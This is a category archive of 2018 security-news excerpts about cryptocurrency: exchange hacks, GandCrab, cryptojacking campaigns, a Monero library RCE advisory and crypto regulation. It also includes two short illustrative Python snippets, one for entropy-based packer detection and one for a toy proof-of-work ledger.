Category Archives: cryptocurrency

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers

A month ago we heard of an attack on the EOSBet gambling app. That time, the hackers exploited a vulnerability

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers on Latest Hacking News.

GandCrab Partners With NTCrypt for Code Obfuscation

GandCrab ransomware has evolved again, and the newest version features a partnership with NTCrypt to facilitate code obfuscation and frustrate security researchers.

As noted by McAfee, GandCrab’s authors deployed version 5 of the ransomware on Sept. 27. Since first appearing in January 2018, the code’s authors have released regular updates that both improved functionality and introduced new bugs.

As the McAfee report put it, the ransomware authors “are undoubtedly confident and have strong marketing skills, but flawless programming is not one of their strengths.” Still, public endorsement of FalloutEK and a new partnership with NTCrypt suggest that GandCrab is looking to claw its way into as many devices as possible with this new iteration.

What Does GandCrab’s Development Mean for Malware Security?

The makers of GandCrab aren’t afraid of notoriety; each new release comes with flashy announcements and promises of new partnerships. As a result, a members-only club of affiliates has developed around GandCrab, with more waiting in the wings to distribute the ransomware. GandCrab’s popularity has also led to partnerships with other criminal groups, which has helped the malware evolve from a simple infection vector to a more sophisticated ransomware-as-a-service.

Particularly concerning is GandCrab’s ability to attract other criminal groups. Its partnership with NTCrypt was established by way of a competition: the crypter received $500 from the developers and free advertising in all GandCrab advertisements. Beyond the obfuscation NTCrypt’s services provide, this recruiting method lets the malware developers screen out low-quality partners while diversifying their supply chain.

The ransomware uses multiple attack vectors to infect devices, encrypt files and demand cryptocurrency, including remote desktop connections, phishing emails, legitimate programs with hidden Trojans, exploit kits, PowerShell scripts and botnets such as Phorpiex.

How to Avoid the Pinch of GandCrab’s Code Obfuscation

Although the GandCrab developers work hard to deliver regular updates, their lack of coding sophistication also introduces bugs that limit functionality or cause outright failure. For example, a build flaw in version 5 makes it depend on a dynamic-link library (DLL) that is not available in Windows Vista or XP, so the malware only works on machines running Windows 7 or later. The authors also claimed that their code doesn’t rely on existing CVEs, but this is inaccurate: GandCrab uses both CVE-2018-8440 and CVE-2018-8120.

Despite its flaws, however, GandCrab remains a potent attack vector. To counter this type of malware security threat, security experts recommend establishing a security baseline, incorporating security best practices into all endpoint builds and ensuring a consistent “golden image” that adheres to your security policy. Security teams should also create and maintain a live inventory of all devices to help pinpoint malware infections, and develop “an aggressive and current patch management policy” to help mitigate the impact of existing vulnerabilities.

Source: McAfee

The post GandCrab Partners With NTCrypt for Code Obfuscation appeared first on Security Intelligence.

India gets its first cryptocurrency ATM in Bengaluru

Crypto Exchange Unocoin Launches Its First Cryptocurrency ATM In India

Unocoin, the oldest crypto exchange and blockchain company in India, officially launched its first cryptocurrency ATM in Bengaluru’s Kemp Fort Mall on October 14, 2018. The ATM is intended to circumvent the ban imposed by India’s central bank, the Reserve Bank of India (RBI), which prevents banks from carrying out any transaction involving cryptocurrencies.

The ATMs installed by Unocoin do not require any banking partnerships; they are stand-alone machines that can accept and dispense cash.

“We at Unocoin have always believed in serving our customers with the best of their interest and with the most secure services. Since December 2013, our team has been serving the Indian bitcoin and blockchain community by continuously innovating and making ways for a smoother and wider experience,” the company said in a post on its official website.

The company has plans to expand the network by opening more ATMs in Mumbai and Delhi in a couple of weeks.

Sathvik Vishwanath, co-founder and CEO of Unocoin, told news.Bitcoin.com on Sunday: “The 1st ATM will be operational in Bangalore tomorrow. In the first phase we plan to deploy 30 machines; the first one is in Bangalore, followed by Mumbai and New Delhi in the upcoming week.”

The ATM is meant exclusively for Unocoin and Unodax (crypto-to-crypto trading platform) customers, who can use it to deposit or withdraw Indian currency from the ATM. This can later be used by customers to buy cryptocurrencies (such as Bitcoin, Ethereum, or other crypto coins) from Unocoin’s website or mobile app.

In accordance with RBI ATM rules, the company has imposed daily transaction limits. The company’s post explains, “Users are subject to some limits on deposits and withdrawals per transaction and per day, subject to cash handling restrictions in India. The minimum amount for deposit and withdrawal is 1000 INR and must be in multiples of 500 INR.”

Vishwanath emphasized, “All coins on Unocoin and Unodax can be bought using the money deposited through ATM machines. We presently have 30 coins that can be bought.”

Solution to RBI Crypto Banking Ban

In April this year, RBI issued a circular banning financial institutions under its control from providing services to crypto businesses. The ban went into effect in July, and all crypto exchanges in India lost their ability to provide rupee deposit and withdrawal services. The most prominent example is Zebpay, the largest Indian crypto exchange, which recently had to close its cryptocurrency exchange because of banking problems.

“The RBI has imposed a ban on banks, regarding money-related transactions, so our customers are not able to buy easily or the ones who have it (bitcoins) are unable to withdraw their money,” Sathvik Vishwanath, co-founder and CEO of Unocoin, told Quartz.

“Therefore, we have come up with this solution to fill the gap caused by the central bank’s ban because right now cash-in and cash-out facility is not available,” Vishwanath said.

How does the ATM work?

The company’s post explains the process that customers need to follow to deposit and withdraw INR and carry out their trades.

“To deposit INR into his Unocoin/Unodax account, a user would go to a Kiosk and enter his User ID and the OTP that he just received by SMS on his registered mobile number. The user would then confirm his account details and deposit the funds into the Kiosk machine. Instantly his Unocoin account will be updated with the deposited funds, which he can use on Unocoin to buy BTC or ETH, or on Unodax to place BID orders on 30 various crypto assets.

“The user can withdraw the deposited INR, or can withdraw INR that he obtained by selling crypto assets on the Unocoin or Unodax platforms. To withdraw INR, users have to make a request by visiting Unocoin.com or through the Unocoin mobile app, where he would specify the desired amount for withdrawal. A 12 digit reference number from Unocoin is sent to the user. The user would then visit the Unocoin Kiosk and enter the reference number and the OTP that was sent to his registered mobile number to withdraw the INR in cash,” the post explains.

Unocoin maintains that its machines do not violate RBI norms, which only prohibit non-banking entities from setting up ATMs for banking operations. “Our ATMs do not need banking network or relationship to work. They just work as the cash deposit and dispensing alternative for Unocoin customers,” said Vishwanath.

While these ATMs fill the gap, the one inconvenience is that customers must physically visit a crypto ATM to complete these transactions.

Unocoin is looking to target malls and other locations in India that have higher footfalls, to set up more ATMs. “At present, the volume (of transactions) has become one-tenth of what it used to be (before the RBI crackdown). We believe that after we have deployed it in many other cities and it becomes popular then demand should come back,” said Vishwanath.

The post India gets its first cryptocurrency ATM in Bengaluru appeared first on TechWorm.

Authorities search & seize properties of GTA V’s “Infamous” cheat developers

By Carolina

Cheat developers are constantly under the radar of Take-Two Interactive and Rockstar Games. Both companies have previously taken legal action against cheat developers for protecting their games including the very popular Grand Theft Auto V (GTA V). Last month, they launched an operation against Australian developers, who had released a well-known mod-menu cheat for GTA […]

This is a post from HackRead.com. Read the original post: Authorities search & seize properties of GTA V’s “Infamous” cheat developers

Threat Actors Obfuscate JavaScript to Hide Crypto-Mining Malware

Security researchers recently observed threat actors burying crypto-mining malware inside compromised websites to hijack victims’ computing resources.

Victims who visited a site infected with the malicious JavaScript code unwittingly unleashed a payload that was hidden within a header file of a WordPress theme, according to researchers from Sucuri.

Although the file itself was legitimate, the code obfuscated the crypto-mining malware and kept it at bay until it confirmed that:

  • The malware wouldn’t be detected via automated scans; and
  • The victim’s device had the central processing unit (CPU) power necessary to mine cryptocurrencies such as bitcoin and Monero.

After the malware confirmed that the infected device met these criteria, it began the mining process.

What Is Crypto-Mining Malware?

Cybercriminals have been using banking Trojans and other tools to mine cryptocurrency since at least 2013, according to the “IBM X-Force Threat Intelligence Index 2018.” One of the most common methods to date has involved mobile apps and websites laden with malicious code hidden inside ads, otherwise known as malvertising.

Coin-stealing has traditionally involved very basic pieces of malware that work over time on a victim’s endpoint. In this recent case, however, researchers were only able to discover the crypto-mining malware after refactoring the code and examining it in detail. Meanwhile, such attacks can drain smartphones, desktops and other systems to enrich the attackers.

How to Keep Crypto-Miners Away From Your Devices

To protect enterprise networks from crypto-mining malware, security experts recommend creating an inventory of all applications in use across the enterprise, then categorizing them by risk attributes, such as whether they are internal or customer-facing.

Security teams should also evaluate applications based on criticality, impact, reputational damage and loss of personally identifiable information (PII), for example. As this incident suggests, however, the impact of a crypto-mining attack could also include loss of computing resources to stealthy cryptocurrency miners.

Source: Sucuri

The post Threat Actors Obfuscate JavaScript to Hide Crypto-Mining Malware appeared first on Security Intelligence.

400% increase in cryptomining malware attacks against iPhones

By Waqas

It wouldn’t be wrong to state that Apple has become the apple of the eyes of cryptomining enthusiasts and cybercriminals. According to Check Point’s latest Global Threat Index, the company is being targeted more frequently in cryptomining malware attacks. The report discloses some startling new facts about the sudden rise in cryptomining malware attacks against […]

This is a post from HackRead.com. Read the original post: 400% increase in cryptomining malware attacks against iPhones

Fake Adobe updates installing cryptomining malware while updating Flash

By Waqas

The IT security researchers at Palo Alto Networks have identified a fake Flash updater that is circulating on the web and fooling computer users by sneakily installing the cryptocurrency mining bot XMRig. In the past few months, researchers have identified 113 fake updaters installing cryptomining malware on targeted devices. The notorious updater has been actively attacking computers since August […]

This is a post from HackRead.com. Read the original post: Fake Adobe updates installing cryptomining malware while updating Flash

Fake Flash updates upgrade software, but install crypto-mining malware

Cybersecurity firm Palo Alto Networks says it discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files that sneak in a cryptocurrency mining bot called XMRig, which mines Monero.

But here's the catch: while the fake updater is installing the XMRig malware, it's also genuinely updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

Shocking: Hackers using Googlebots in cryptomining malware attacks

By Waqas

Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search Results to distribute Zeus Panda banking trojan. Now, researchers at F5 identified a strange and infrequent behavior […]

This is a post from HackRead.com. Read the original post: Shocking: Hackers using Googlebots in cryptomining malware attacks

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by concealing their payloads inside code that is not strictly malicious. In particular, packers use a technique called executable compression to make their files smaller. The Delphi packer adds to this by monitoring windows and mouse cursor movement for signs of a sandbox environment; if it finds them, it puts itself into an infinite sleep.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.
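Because executable compression leaves a payload that is statistically close to random, byte entropy is one of the cheapest triage signals a defender has for packed or crypted binaries. The following is an added example, not code from FireEye, Malwarebytes or the article: it computes Shannon entropy over fixed-size windows and flags a buffer when most windows look compressed. Both sample buffers are constructed inline (a repeated plain-text block, and pseudo-random bytes built from SHA-256 to stand in for a compressed section); the `window`, `threshold` and `min_fraction` parameters are assumptions chosen for this illustration.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 512, threshold: float = 7.0):
    """Return (offset, entropy) for every non-overlapping window at or above threshold."""
    hits = []
    for off in range(0, len(data) - window + 1, window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def looks_packed(data: bytes, window: int = 512, threshold: float = 7.0,
                 min_fraction: float = 0.5) -> bool:
    """Heuristic: flag the buffer if at least min_fraction of its windows are high-entropy.

    This is a triage signal only. Legitimate binaries that embed compressed
    resources (images, archives, signed certificates) also score high, so a hit
    should route a sample to sandboxing, not be treated as a verdict.
    """
    total_windows = max(1, len(data) // window)
    return len(high_entropy_windows(data, window, threshold)) / total_windows >= min_fraction


# Constructed sample 1: ordinary program text (low entropy, roughly 4-5 bits/byte).
PLAIN_SAMPLE = (b"procedure TMainForm.ButtonClick(Sender: TObject); begin ShowMessage('ok'); end;\n"
                * 128)

# Constructed sample 2: stand-in for a compressed section. A SHA-256 chain gives
# deterministic, near-uniform bytes, which is what a packed body looks like.
PACKED_SAMPLE = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(256))


def triage(data: bytes) -> dict:
    """Summarise one sample the way a scanner would log it."""
    return {
        "size": len(data),
        "entropy": round(shannon_entropy(data), 2),
        "high_entropy_windows": len(high_entropy_windows(data)),
        "looks_packed": looks_packed(data),
    }


if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, triage(sample))
```

The window size matters: whole-file entropy is diluted by headers and import tables, so scanning windows (or, with a PE parser, individual sections) is what separates a packed body from an unpacked one with a small compressed resource.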

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior. The threat advisory on IBM X-Force Exchange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers available in dark web marketplaces.

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

The Ethical Hacker Network: Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018

Register Now to Learn Blockchain Hacking Step-by-Step!

Nick Furneaux, forensics trainer, investigator & author of "Investigating Cryptocurrencies" takes you through a journey of code and tools to unpick the movement of illegal funds through the blockchain during this fascinating, FREE EH-Net Live! webinar on Wednesday October 24, 2018 at 1:00 PM US Eastern. Join us live to learn how to win free copies of his book!

The post Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018 appeared first on The Ethical Hacker Network.

Trust flourishes in blockchain

If implemented effectively, blockchain has the potential to transform the way we do business. After several years spent in the shadow of bitcoin, it’s time for blockchain, the technology on

The post Trust flourishes in blockchain appeared first on The Cyber Security Place.

Digital Assistants, Cryptocurrency, Mobile Malware: Trends from ‘McAfee Labs Threats Report’

Every three months, our team crafts the McAfee Labs Threats Report. The quarterly report ranges in topic and severity but always touches on the most important and impactful threats afflicting consumers and companies alike. This year, the McAfee Labs team analyzed an average of 1,800,000 URLs, 800,000 files and 200,000 high-risk files to produce the McAfee Labs Threats Report: September 2018, which features digital assistants, cryptocurrencies, and cybercriminal gangs up to no good. Overall, it’s been an eventful quarter.

So, what are the key takeaways for you? Notably, our team has continued to track a downward trend in new malware attacks for the second successive quarter. That is good news on the surface, but the trend may not be indicative of much, as we also saw a spike in new malware in Q4 2017. We’ll continue to watch this into next year. Significantly, we found that a good portion of net new malware is designed for mobile; that category increased 27 percent over the previous quarter. In addition, here’s a look at the other trending stories we uncovered.

Digital Assistants

Digital assistants are advanced programs that we can converse with to research, act on our behalf and generally make our digital lives more comfortable. Siri, Bixby and Google Assistant are a few. But one digital assistant, Microsoft’s Cortana, is a little too helpful. The good news: Microsoft quickly rolled out a fix for this vulnerability to protect your Windows 10 computer. Be sure your software is up to date.

Cryptocurrency

The second story involves cryptocurrencies. Cryptocurrencies are digital tokens generated by a computer after solving complex mathematical functions. These functions are used to verify the authenticity of a ledger, or blockchain. Blockchains, by their nature, are relatively secure. But an account that is connected to a blockchain — usually, in this case, associated with a cryptocurrency — is not. And that’s where cybercriminals are focusing their efforts, with coin miner malware up 86% in Q2 2018.

Our report found cybercriminals are chasing after access to cryptocurrencies and they’re doing so using familiar tactics. For example, phishing attacks — where cybercriminals pose as someone else online — are popular tools to take over a cryptocurrency-related account. Malicious programs are also deployed to collect passwords and other information related to an account before stealing virtual currency. You can read more about blockchain and cryptocurrency vulnerabilities here. 
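The sentence above about mining functions verifying the authenticity of the ledger is easier to see in code. The following is an added example, not McAfee's code: a minimal proof-of-work chain in which each block commits to the previous block's hash and must carry a nonce that drives its own hash below a target (here, three leading hex zeros, a constructed difficulty chosen so the example mines instantly; real networks use far harder targets and hash a richer block header). The verifier then shows why the ledger itself is hard to tamper with: editing one entry breaks that block's hash and every link after it.

```python
import copy
import hashlib
import json

DIFFICULTY = 3  # constructed: required number of leading hex zeros in a block hash
GENESIS_PREV = "0" * 64


def block_hash(index: int, prev_hash: str, data: str, nonce: int) -> str:
    """Hash of the fields a block commits to, serialised deterministically."""
    payload = json.dumps([index, prev_hash, data, nonce], separators=(",", ":")).encode()
    return hashlib.sha256(payload).hexdigest()


def mine_block(index: int, prev_hash: str, data: str, difficulty: int = DIFFICULTY) -> dict:
    """Search nonces until the block hash meets the difficulty target (the 'work')."""
    nonce = 0
    while True:
        h = block_hash(index, prev_hash, data, nonce)
        if h.startswith("0" * difficulty):
            return {"index": index, "prev_hash": prev_hash, "data": data,
                    "nonce": nonce, "hash": h}
        nonce += 1


def build_chain(entries, difficulty: int = DIFFICULTY) -> list:
    """Mine a genesis block and then one block per ledger entry, each linked to the last."""
    chain = [mine_block(0, GENESIS_PREV, "genesis", difficulty)]
    for i, entry in enumerate(entries, start=1):
        chain.append(mine_block(i, chain[-1]["hash"], entry, difficulty))
    return chain


def verify_chain(chain: list, difficulty: int = DIFFICULTY):
    """Return (True, None) for a valid chain, or (False, index) of the first bad block.

    A block is bad if its stored hash does not match its fields, if the hash does
    not meet the target (no work was done), or if it does not link to its predecessor.
    """
    for i, b in enumerate(chain):
        recomputed = block_hash(b["index"], b["prev_hash"], b["data"], b["nonce"])
        if b["hash"] != recomputed or not b["hash"].startswith("0" * difficulty):
            return False, i
        if i > 0 and b["prev_hash"] != chain[i - 1]["hash"]:
            return False, i
    return True, None


def tamper(chain: list, index: int, new_data: str) -> list:
    """Copy the chain and silently edit one entry without re-mining (what an attacker wants)."""
    forged = copy.deepcopy(chain)
    forged[index]["data"] = new_data
    return forged


if __name__ == "__main__":
    # Constructed ledger entries.
    ledger = build_chain(["alice->bob:5", "bob->carol:2", "carol->dave:1"])
    print("valid:", verify_chain(ledger))
    print("after edit:", verify_chain(tamper(ledger, 1, "alice->bob:500")))
```

Note what the check does and does not cover: it protects the recorded history, not the credentials of the account that signs new entries, which is exactly the gap the report says attackers are exploiting with phishing and password-stealing malware.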

Malicious Apps

Finally, the McAfee Mobile Research team found a collection of malicious applications facilitating a scam in the Google Play store. The apps in question siphon money from unwary users through billing fraud, which collects money from victims for “using” a “premium” service, such as sending texts to a particular number.

In this case, the cybercriminal ring known as the AsiaHitGroup Gang attempted to charge at least 20,000 victims for downloading fake or copied versions of popular applications. To increase its potential, AsiaHitGroup Gang is using geolocation to target vulnerable populations.

So, what can you do to stay safe in the face of these threats? Here are three quick tips:

  • Limit device access. If you can, limit the ability and access a digital assistant has to your device. Often, you can adjust where and how an assistant is activated through your settings. Otherwise, update your software regularly, as many updates contain security fixes.
  • Create strong passwords. If you’re participating in the cryptocurrency market, then make sure you use strong, robust passwords to protect your accounts. This means using upper case, lower case, symbols and numbers for passwords that are 12 characters long. Afraid you might forget the key to your account? Consider using a password manager.
  • Be careful what you download. Always do some light research on the developer of a mobile application. If the information is hard to come across or absent, consider using an alternative program. Additionally, never download mobile applications from third-party app stores. Genuine stores, like Google Play and Apple’s App Store, should provide you with what you need.

And, of course, stay informed. To keep atop of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Digital Assistants, Cryptocurrency, Mobile Malware: Trends from ‘McAfee Labs Threats Report’ appeared first on McAfee Blogs.

Hackers exploit Bitcoin bug to print 235 million Pigeoncoins

By Uzair Amir

It has been confirmed by the Pigeoncoin developers that a recently discovered bug in Bitcoin’s code has now been exploited to print approx. 235m Pigeoncoins ($15,458). It must be noted that Pigeoncoin is a newly launched and somewhat lesser known digital currency. The reason the extraordinary feat was successfully pulled off by the hacker(s) is […]

This is a post from HackRead.com. Read the original post: Hackers exploit Bitcoin bug to print 235 million Pigeoncoins

Fork-free, Energy Efficient Red Belly Blockchain Hits 30,000 Transactions per Second

Red Belly, a fork-free Blockchain that previously demonstrated transaction speeds several times faster than Bitcoin and Ethereum, was subjected to a new experiment in which it reached 30,000 transactions per second. This is reported by CSIRO’s Data61, the technology arm of Australia’s national science agency, which took part in the development together with the Concurrent Systems Research Group at the University of Sydney.

3,000 Trx/Sec matching 14 regions

The experiment was deployed in 14 regions covered by Amazon Web Services’ network, including North America, South America, Asia Pacific, and Europe. With 1,000 machines maintaining a copy of the current state of the Blockchain and the balance of all accounts, the Blockchain demonstrated an average transaction delay of three seconds, which is comparable to the delay obtained during a test last year with 260 replicas located in a single region.

In comparison, mainstream blockchain technologies need minutes, with the Bitcoin Blockchain and the Ethereum network typically processing seven and 20 transactions per second respectively.

The experiment shows that the newly launched Blockchain’s scalability, combined with fast transaction speeds, makes it well suited to processing financial transactions and to microgrids that use peer-to-peer trading to transform the energy sector.

Fork-free, no double spending

In addition to high throughput, Red Belly differs from existing solutions in a number of ways. It is fork-free, in contrast to Bitcoin, which selects the longest branch of a forked chain (or tree) when multiple nodes add different blocks at the same point before learning of one another’s blocks.

The Blockchain eliminates the risks of double spending where an individual spends their money twice by initiating more than one transaction, researchers say.

Beyond that, it’s much friendlier to the environment because it requires far less electricity than blockchains maintained by proof of work, which are based on solving crypto puzzles that consume massive amounts of energy. Red Belly is underpinned by a unique algorithm and offers performance that scales without an equivalent increase in electricity consumption.

“Real-world applications of blockchain have been struggling to get off the ground due to issues with energy consumption and complexities induced by the proof of work. The deployment of Red Belly Blockchain shows the unique scalability and strength of the next generation ledger technology in a global context,” Dr. Vincent Gramoli, senior researcher at CSIRO’s Data61 and head of Concurrent Systems Research Group at the University of Sydney said.

Being marked as a revolutionary solution for the global economy, Red Belly Blockchain has also attracted big-time investors. The company is currently in the middle of a Series A capital raise to help it commercialize, and Kosmos Capital, a VC firm specializing in blockchain investments, is the one leading the raise.

For more information on Red Belly Blockchain, visit redbellyblockchain.io.

The post Fork-free, Energy Efficient Red Belly Blockchain Hits 30,000 Transactions per Second appeared first on TechWorm.

Exploring the Fundamentals of Blockchain

While the concepts of cryptocurrency and blockchain have been around for years, it wasn’t until Bitcoin’s recent and dramatic explosion in value that these terms became mainstream. Once the digital

The post Exploring the Fundamentals of Blockchain appeared first on The Cyber Security Place.

Vulnerability Spotlight: Epee Levin Packet Deserialization Code Execution Vulnerability

This vulnerability was discovered by Lilith (>_>) of Cisco Talos.

Overview

The Epee library, which is leveraged by a large number of cryptocurrencies, contains an exploitable code execution vulnerability in the Levin deserialization functionality. An attacker can send a specially crafted network packet to cause a logic flaw, resulting in remote code execution.

In accordance with our coordinated disclosure policy, Cisco Talos has worked with the developers of Monero 'Lithium Luna' to ensure that these issues have been resolved and that an update has been made available for affected users. It is recommended that this update is applied as quickly as possible to ensure that systems are no longer affected by this vulnerability.


Vulnerability Details

Epee Levin Packet Deserialization Code Execution Vulnerability (TALOS-2018-0637 / CVE-2018-3972)

The Levin network protocol is an implementation of peer-to-peer (P2P) communications found in a large number of cryptocurrencies, including all of the currencies forked from the CryptoNote project. Several implementations of Levin exist; this post focuses on the Epee library implementation, which is used in a large number of cryptocurrencies, most notably Monero. A vulnerability exists in the way the library deserializes the Levin protocol, leading to an incorrect type conversion or cast, which can be abused to gain remote code execution. For additional information, please see the advisory here.

The vulnerability was tested on Monero 'Lithium Luna' (v0.12.2.0-master-ffab6700).
https://lists.getmonero.org/hyperkitty/list/monero-announce@lists.getmonero.org/thread/DB22JKE5SU4KB772ZBQFXAI4FWVWMUNF/

Coverage

The following Snort ID will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47342

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If an attacker can steal Bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems? There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords have changed that view. If an attacker can hijack enough systems, mining in high volume can be profitable. It is not only individuals who struggle to protect against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

Zaif Cryptocurrency Exchange Hacked $60 Million Plundered

This year seems to be really hard for the cryptocurrency exchanges worldwide as we witness repeated successful hacks and cyber

Zaif Cryptocurrency Exchange Hacked $60 Million Plundered on Latest Hacking News.

Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

By Waqas

Zaif is the 35th largest cryptocurrency exchange by turnover. Hackers have stolen a whopping $60 million (6.7 billion yen) worth of cryptocurrency from Zaif, the 35th largest cryptocurrency exchange dealing in Bitcoin, Bitcoin Cash, and Monacoin. The exchange is owned by Tech Bureau, Corp. based in Nishi-Ku, Osaka, Japan. The hack attack took place on September 14th after hackers gained […]

This is a post from HackRead.com Read the original post: Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

First Publicly Known Malicious Crypto-Mining Campaign Launched Via Kodi

Researchers detected what they believe is the first publicly known malicious crypto-mining campaign launched via the open-source media player Kodi.

This month, Slovakian IT security company ESET discovered malware hidden in XvBMC, a Dutch repository for third-party Kodi add-ons. Further analysis revealed that threat actors had initially infected two other repositories with the malware in December 2017 and January 2018. From those two sources, the malware spread to XvBMC and throughout the rest of the Kodi platform.

Windows and Linux users ended up running the final malware payload, a Monero cryptocurrency miner, by adding the URL of a malicious repository to their Kodi installation or installing a Kodi build that contained either a malicious repository or an infected add-on. No variants targeting Android or macOS users were detected by ESET.

At the time of disclosure, the malware had infected 4,774 users and generated approximately $6,700.

Why Are Attackers Capitalizing on Add-Ons?

Cybercriminals are increasingly abusing add-ons and scripting functionalities in response to the tightening of security measures for operating systems. The industry recently witnessed this trend in the form of bad actors leveraging Visual Basic for Applications (VBA) macros to spread malware.

In 2016, IBM Managed Security Services observed an attack campaign using VBA macros to deliver Locky ransomware. Last year, Fortinet researchers observed two attacks where threat actors leveraged VBA macros embedded in Excel attachments to spread Dyzap malware and a variant of Strictor ransomware.

The ESET researchers clarified that they don’t expect Kodi add-ons to become the “next VBA,” but they did say they “may be an indication of things to come.”

How to Prevent a Crypto-Mining Campaign

To limit the threat of cryptojacking, security experts recommend implementing controls to help identify mining activity and blocking known crypto-mining malware variants. Security teams should also consider using security information and event management (SIEM) and behavioral analytics to identify suspicious resource usage patterns.

Sources: ESET, Fortinet

The post First Publicly Known Malicious Crypto-Mining Campaign Launched Via Kodi appeared first on Security Intelligence.

UK Treasury committee report: regulation is closing in on cryptocurrency

Bitcoin has truly taken off, at a current worth of more than 5,000 euros. Other cryptocurrencies are slowly catching up, but there is one special surprise waiting for investors and exchanges that might hinder their expansion plans. Things are about to get complicated because MPs in the UK want to regulate cryptocurrency, writes The Guardian.

For a while now, governments and institutions operating in the financial services industry have been discussing this aspect, trying to find ways to regulate it on grounds that it is risky and it enables illicit activities such as money laundering.

According to the Treasury committee report, consumers are also at risk because cryptocurrency is still an unregulated “wild-west”-type industry that bypasses banks, so there is no protection from the Financial Conduct Authority should anything happen to their crypto-assets. “Accordingly, investors should be prepared to lose all their money,” the report says.

In response, the FCA “agrees with the committee’s conclusion that bitcoin and similar crypto-assets are ill-suited to retail investors, and as we have warned in the past, investors in this type of crypto-asset should be prepared to lose all their money.”

“Bitcoin and other crypto-assets exist in the wild west industry of crypto-assets. This unregulated industry leaves investors facing numerous risks,” said the committee chair, Conservative MP Nicky Morgan. “Given the high price volatility, the hacking vulnerability of exchanges and the potential role in money laundering, the Treasury committee strongly believes that regulation should be introduced.”

CryptoUK, a trade association that represents companies operating in the digital currency landscape and promotes good conduct in this sector, embraced the report.

“As an industry we have been calling for the introduction of proportionate regulation to improve standards and encourage growth,” said Iqbal Gandham, the chair of CryptoUK. “Self-regulation by the industry was always intended to be a starting point – this must now be matched by government action.”

The committee strongly believes that proper regulation could reduce the number of cyberattacks and could turn cryptocurrency into a business opportunity.

Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining

